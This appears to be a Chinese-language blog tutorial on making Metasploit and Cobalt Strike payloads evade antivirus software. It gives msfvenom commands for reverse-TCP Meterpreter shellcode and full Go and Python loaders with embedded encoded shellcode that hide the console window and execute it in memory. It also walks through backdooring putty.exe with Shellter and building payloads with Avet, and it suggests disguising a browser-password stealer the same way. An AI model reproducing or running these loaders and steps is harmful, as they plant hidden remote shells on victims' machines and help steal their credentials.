Metasploit、cobalt strike免杀,其实这2款工具的免杀都差不多的,都是先生成shellcode然后各种加密、内联其他语言,基本能免杀世界上主流的杀软。现在来介绍一下几种免杀姿势以及工具。

姿势一 内联C语言

内联C语言,然后用Golang的环境编译成exe
1.原文地址:http://hacktech.cn/2017/04/20/msf-AntiVirus.html
2.90sec地址:https://forum.90sec.org/forum.php?mod=viewthread&tid=10492
1.用Metasploit生成payload
msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py > 1.py
2.把内容替换到下面的代码中,如果cobaltstrike的shellcode的话要在"="前面加上":"

package main
/*
void call(char *code) {
    int (*ret)() = (int(*)())code;
    ret();
}
*/
import "C"
import "unsafe"
func main() {
    buf := ""
    buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
    buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
    buf += "\x46\x84\xfd\x72\xee\x0e\xb5\x96\x37\x04\x6d\x63\x9f"
    buf += "\xcc\xa4\x3a\x8e\x8c\xf7\x39\x81\xca\xe4\x42\xff\xce"
    buf += "\xa3\xa2\xdb\x06\xc0\x3f\xaf\x41\x73\xba\xf7\x20\x13"
    buf += "\x98\x8c\xff\xfa\x0a\xda\x6e\xf2\x6d\xc3\x81\x07\xc0"
    buf += "\x1b\x37\xeb\xa2\xa9\x32\x71\xaf\xe9\x20\xd1\xaa\x9e"
    buf += "\xbd\x82\xf3\x81\x1f\xab\xbf\xc4\xd9\x6c\x75\x37\x3a"
    buf += "\x53\x78\x90\x79\xaf\x93\x1b\xb3\x15\x09\xe5\x45\x5c"
    buf += "\x26\x0f\x0d\x16\x52\xf1\x8a\x7e\x8b\xc4\x50\x8e\x0a"
    buf += "\x38\x2f\x2b\x40\x73\x0b\xf0\x51\x5f\xc6\xbf\x04\x47"
    buf += "\x80\x36\xe5\x88\x88\xb3\xfc\xa0\x52\xfe\x92\x81\x8d"
    buf += "\x89\xf2\x6a\xcc\x7f\x9a\xe9\x1a\x30\x73\xa3\x63\x42"
    buf += "\x10\xe9\xcf\x62\xe4\x06\x52\xe1\x8d\x88\xfe\x52\xc4"
    buf += "\xc3\xed\x7a\x0e\x66\x5f\x8c\x2c\xef\xfa\xbd\x8c\x79"
    buf += "\x6c\x01\xe3\x5c\xde\xc4\x8a\x4c\x7d\x34\x32\xb5\x23"
    buf += "\x56\x6c\x52\x3f\x15\x26\x6a\xf8\x6b\x81\x2c\x23\x8d"
    buf += "\x41\x6e\x24\x30\xc6\xcb\xba\x26\xd4\x3b\x37\xd3\xc6"
    buf += "\xa8\x5a\x16\x8f\x1e\x27\xca\xcb\xda\x7f\x74\x62\xb2"
    buf += "\x62\xa6\xb1\xfc\x64\x53\x3a\xa7\xa4\x21\x3d\x79\x08"
    buf += "\x06\x74\x2a\xa2\xe7\x0d\x68\x16\xa3\x96\xe5\xad\x32"
    buf += "\x10\xa3\x0f\x49\xc3\x69\xa7\x5b\x61\x1a\xf8\x1d\x9e"
    buf += "\x9b\x3a\x00\xfc\x18\xc3\x42\x1a\xd6\x44\x5d\xfe\xc5"
    buf += "\xb6\x68\xd2\xad\x24\xda\x74\xa7\xf3\x66\x9a\x42\x7a"
    buf += "\x50\xf0\x0b\x47\xbc\xad\x6c\x1e\xca\xbe\x90\xca\xc3"
    buf += "\x8e\x5b\xde\x66\xe2\xb3\x20\x6f\x38\x17\xc1\xac\xfb"
    buf += "\xd3\x2f\x91\xa7\xff\x65\xd7\xd0\x25\x4c\xd4\xb3\x35"
    buf += "\x38\xa1\x82\xb8\x23\x42\xe9\xa5\x95\x8e\xc4\x35\xca"
    buf += "\x92\xfe\xde\x62\x70\xd6\x7a\x7f\xfd\xfb\xf0\x24\xbd"
    buf += "\x5d\x6d\x3d\x13\xbc\x1d\x25\x54\x9d\x0e\x68\xc8\x9a"
    buf += "\x10\x87\xf0\xc9\xac\x37\x57\x84\x23\x5f\x8a\xc0\xab"
    buf += "\x52\x6e\xae\x79\xa2\xdb\xff\xd8\x41\x28\x8b\xd3\x9d"
    buf += "\x68\x3c\x55\xf2\xfe\x0c\x8a\x38\xdf\xb3\x80\x9b\x70"
    buf += "\x2b\x4e\xe1\xfa\x0b\xfe\xf5\xc3\x1a\x0d\x83\xb0\x69"
    buf += "\xd0\x68\xfb\xe0\xae\xbd\x56\x52\x17\x9a\xf8\x8f\xc0"
    buf += "\x14\x8c\xb0\xf7\x0e\x87\xfa\x54\xf4\x04\x4a\x5a\xc8"
    buf += "\x89\x57\x0e\xbf\x7a\x76\x9b\xfe\xb8\x5f\x31\x42\xec"
    buf += "\xaf\x18\x9e\x3f\xf0\x09\x79\x86\xb3\x08\x29\x50\xfd"
    buf += "\xc3\x46\x7d\x24\x51\x5b\xd0\x81\x19\x6f\xc2\x2c\x17"
    buf += "\xab\xa3\xb7\xd9\x6f\x82\xd9\x37\x5f\x38\x01\xd8\xfd"
    buf += "\xfd\x11\x22\x61\xd0\x92\x45\x37\x4f\x6c\x4e\x91\x3b"
    buf += "\x42\x07\xc5\x77\xdc\x52\xd6\xc7\x9d\x7b\x62\xba\x1c"
    buf += "\x62\x3c\xde\xad\x96\x03\x55\xde\x9d\x52\x5c\x5d\x0c"
    buf += "\x73\x0e\xc3\x4c\xae\x7d\x1c\x7c\x64\xaf\xbb\xce\xa6"
    buf += "\x02\x0e\xb1\x51\xc4\x2d\x1b\x6b\xb7\x7c\xd9\x4b\xc3"
    buf += "\x8c\x43\xd6\x1b\x2a\x4f\x5e\x0a\x9a\xd5\x4d\x45\x64"
    buf += "\x6c\x0c\xc8\xf5\x59\xd7\x45\x36\x85\x99\x8d\x34\x65"
    buf += "\x21\xd3\x3b\x35\xce\x22\x29\x0c\x4e\xca\x48\x3f\x55"
    buf += "\x5d\x1b\xda\x35\xc1\x2d"
    // at your call site, you can send the shellcode directly to the C
    // function by converting it to a pointer of the correct type.
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}

3.安装相关编译环境
如果你生成的shellcode是x64的 就要用x64的环境去编译,x86同理。所以一个环境配套一个类型的shellcode

  • 安装go环境
    x64 https://storage.googleapis.com/golang/go1.8.3.windows-amd64.msi
    x86 https://storage.googleapis.com/golang/go1.8.3.windows-386.zip
  • 安装GCC编译环境
    x64 http://sourceforge.net/projects/tdm-gcc/files/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe/download
    x86 http://sourceforge.net/projects/tdm-gcc/files/TDM-GCC%20Installer/tdm-gcc-5.1.0-3.exe/download

姿势二 来自余弦公众号

来自 http://mp.weixin.qq.com/s/OxgJIIPaXMXqrY5lPdukdA
还未实践

姿势三 veil

生成的文件有点大,我们可以尝试用他生成的源文件内联其他语言并加密,此事我只是有这个想法,还没有实践过
传送门:
http:mp.weixin.qq.comspfemhj6uqyctbafbqyglka
< https://github.com/Veil-Framework/Veil >
< https://github.com/Veil-Framework/Veil-Evasion ></http:mp.weixin.qq.comspfemhj6uqyctbafbqyglka>

姿势三 Shellter

Shellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。
1.安装:apt-get update&&apt-get install shellter
2.安装完毕后输入shellter打开工具

3.这里选择Auto,A,然后输入需要注入的exe文件路径

4.这里我选择使用一个putty作为注入的exe。

5.然后就自动生成,这里可以看到一些生成的信息。

6.这里选择是否使用隐蔽模式,选择Yes

7.这里选择payload,我选择L后选择1的payload

8.设置监听机ip和端口

9.生成完毕。这时我们可以把原来的那个putty.exe文件移到物理机上试验一下,同时打开msfconsole的监听。

10.当在物理机上打开putty后,已经弹回了shell,为所欲为。但是注意要及时迁移注入到其他进程中,如果不迁移,putty一旦被关闭,连接也会断开。国内杀毒软 件检测结果如下图。

姿势五 Avet

安装 :
1.用WINE安装TDM-GCC,默认配置安装这里不再详细说明
2.git clone https://github.com/govolution/avet
安装完毕后,找到自己想要生成的后门载荷,切到/avet/build/目录下打开相应的.sh文件对LHOST和LPORT进行修改。

然后再用切换到/avet目录执行./build/相应的载荷,如下图。

生成完的.exe文件就在avet文件夹内,默认名称为pwn.exe。

打开msf监听返回shell。

这款工具是目前免杀效果最好的,免杀效果如下图

姿势六 Python加密

在生成python格式的shellcode的情况下,我们可以加密一下然后再生成exe也可达到很好的免杀效果,我们也可以用在免杀一些具有间谍性质的py脚本转成的exe的工具上,
如:获取浏览器密码的python,在目标是win上没有办法使用的,我们就可以生成exe的,在有杀软的情况下我们就可以这样加密脚本再生成。

< http://lu4n.com/metasploit-payload-bypass-av-note/ >
1.生成payload
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -e x86/shikata_ga_nai -i 11 -f py

2.覆盖下面的buf代码,cobaltstrike要加个":",跟上面那个差不多

from ctypes import *
import ctypes
buf =  ""
buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29"
buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\xed\xfc\xe2"
buf += "\xe2\xe6\x30\x37\xec\xba\xe0\xf0\x35\xc8\x36\x0b\x98"
buf += "\x00\xfe\x42\xb3\x52\x5d\xb7\xb0\xc9\x4f\x34\x7f\xa8"
buf += "\x6d\x6c\xd1\x7b\x77\xcd\x6d\x92\x35\x6a\x79\x41\x1d"
buf += "\x16\x66\x6f\x97\xce\x5e\x17\xb3\xef\xdc\x73\xcb\xdb"
buf += "\x3c\xd5\x6d\xfd\x01\x37\x1c\x73\xbf\x36\x58\xd4\x58"
buf += "\x12\xce\x52\x67\x6c\xdb\x18\x8a\x25\xfa\x9f\x7d\xa3"
buf += "\x9c\x49\xd9\xde\x7d\xc8\x1e\x10\xea\xff\x48\x4f\x31"
buf += "\xb5\x13\x18\x05\x9b\x21\x7f\xd1\xd2\xae\x85\x96\x03"
buf += "\x41\xcb\x11\x11\x70\x45\x0c\x64\xc3\xf5\xd8\x8f\x63"
buf += "\x18\x82\xc3\xee\x9a\x08\xac\x37\xa0\xed\x1a\x57\x25"
buf += "\x76\xd4\xde\xc0\x17\xa8\xeb\x1b\x12\x3c\x00\xf3\xf4"
buf += "\xa2\x90\x60\xd6\x2d\x62\xb8\xbc\x32\xf3\x9d\x2b\x8a"
buf += "\xd8\x8a\x27\x24\xc0\xfa\xd7\x72\xb1\x73\xc1\x91\x66"
buf += "\xb8\x86\x61\x16\x12\x11\x32\x59\xd1\x20\x8f\x34\x26"
buf += "\xd6\x98\xda\xc8\xfe\xcb\x91\xec\xb0\x5e\xd8\xa1\x8c"
buf += "\x10\x95\xbd\x00\x81\x0c\xd9\x7a\xb1\xf3\xf6\x45\x0d"
buf += "\x0f\x88\x5f\x9a\xd5\xf6\xbc\xd6\xfd\xa2\xb1\xef\x66"
buf += "\xac\x1e\xa6\x28\x6c\x09\x14\xe8\x0c\x7f\xb6\x0a\x3a"
buf += "\x4c\xf6\xc2\xbd\xd2\x0e\xea\x59\x2a\x69\x2c\x42\x62"
buf += "\x18\x78\x8b\x32\x20\xb7\x46\x46\xa1\xbe\x0a\x9e\xa4"
buf += "\x38\x74\x6d\x3d\x23\x0b\x2e\xd3\x76\xe6\x21\xb1\x69"
buf += "\x5c\x55\x9e\xac\xa8\x04\x0b\x50\x7f\x99\x10\x72\x21"
buf += "\xf5\x51\x99\xc0\xc2\x25\x5f\x06\x7a\x8a\xa9\x5e\xf4"
buf += "\x5b\xe9\x6b\xc8\x50\xc1\xc5\x49\x89\x2a\x3a\x70\x0c"
buf += "\xb0\x50\x0d\xa2\xa9\x18\xff\x30\xd9\x19\xdc\xb8\x9a"
buf += "\xa1\x3e\x7c\x8f\xe0\x3e\xdf\xc5\x93\x18\x83\x25\x99"
buf += "\x10\xab\xa3\x03\x98\xba\x83\x8f\x65\x83\xa2\xbb\x79"
buf += "\x2f\xd7\xe1\xb1\xdb\xde\x59\xca\x4f\xa5\xb5\xfd\xa8"
buf += "\x22\xdd\xa6\x41\xee\xcd\x8c\xaa\xb6\xf7\x24\xe9\xe0"
buf += "\x9a\x0d\x59\x77\x81\x3f\x14\x60\x7e\xdd\x42\xd8\x9e"
buf += "\x19\x96\x52\x5b\xca\x91\x28\xc0\x53\x48\x50\x8d\x51"
buf += "\xa8\x23\x1b\x37\xdc\xd3\x7d\x8e\xc5\xd3\x2c\x05\xf2"
buf += "\x8e\xb7\xf7\x68\xe1\x12\x6c\x9d\x6e\xb4\x98\x7c\x58"
buf += "\xfa\xf2\x5f\x89\xd0\x99\xaf\xa5\x52\x6f\x25\xd3\x9b"
buf += "\xa7\xa1\xaa\x56\x24\x75\xe3\x5f\x16\x02\x22\x10\xd0"
buf += "\xb0\x83\xc4\xf9\xa0\x35\xfd\xce\x5d\x80\xbd\x4b\x43"
buf += "\xf2\xf2\x61\x72\xba\xe7\x4a\xd3\xa9\x0e\x83\x3f\xc9"
buf += "\x44\x41\x1f\xf2\x01\x28\x60\x5c\x01\xcd\x64\x20\x97"
buf += "\xa6\x64\xb4\x3d\x2b\xdb\x78\xf4\xa4\xfd\x39\xb9\x9d"
buf += "\x0c\x53\x3b\x08\xb7\x8a\x97\x85\xa5\x10\x4b\xca\x60"
buf += "\x51\xca\xb0\x50\xce\xf4\x2e\xbb\x59\xa6\x4b\x29\xe5"
buf += "\x19\x90\xe1\x31\xc6\xaa\x6b\xfe\xd3\xdd\xd9\x9c\xf9"
buf += "\xae\xfc\x3a\x10\x50\x85\xf4\xc6\xa0\x54\x9d\x76\x1e"
buf += "\x95\xad\x4e\x77\x6d\xd6\x75\x2b\x6f\x12\x58\x3f\xde"
buf += "\x3a\x72\xd1\x90\x65\xa8\x11\x60\x0e\x22\x60\xeb\x7a"
buf += "\xc7\x13\x6f\xaf\x56\x5b\x71\xdc\xa2\x6a\x7d\xfa\x42"
buf += "\x90\x82\x01\xd5\x98\x6d"

#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr:  
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()    
if whnd != 0:
    if 666==666:
        ctypes.windll.user32.ShowWindow(whnd, 0)    
        ctypes.windll.kernel32.CloseHandle(whnd)
print "……………………………."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                    buf,
                                    ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
print "Code By Luan"
shell()

3.安装python的Pywin32模块
http://99idc.jb51.net:81/201601/tools/pywin32_2.7(jb51.net).rar 这个是python ver2.7的,建议安装python 2.7

4.下载pyinstaller
https://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip

5.把shellcode 的文件放进pyinstaller的根目录,然后
python PyInstaller.py --console --onefile msf.py
msf.py就是shellcode的文件名称

姿势七

我感觉原理上跟上面的内联C语言差不多吧,这个主要用于cobaltstrike的免杀,因为msf可以直接免杀了。

cat payloadx86.bin |msfvenom - -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f csharp

总结 msfvenom

工具总归是工具,只是把重复的步骤机械化处理,在面对世界各大杀软的时候我们还是要善于变换,就比如先用msf编码一下,再内联,你说呢。

发表评论

电子邮件地址不会被公开。 必填项已用*标注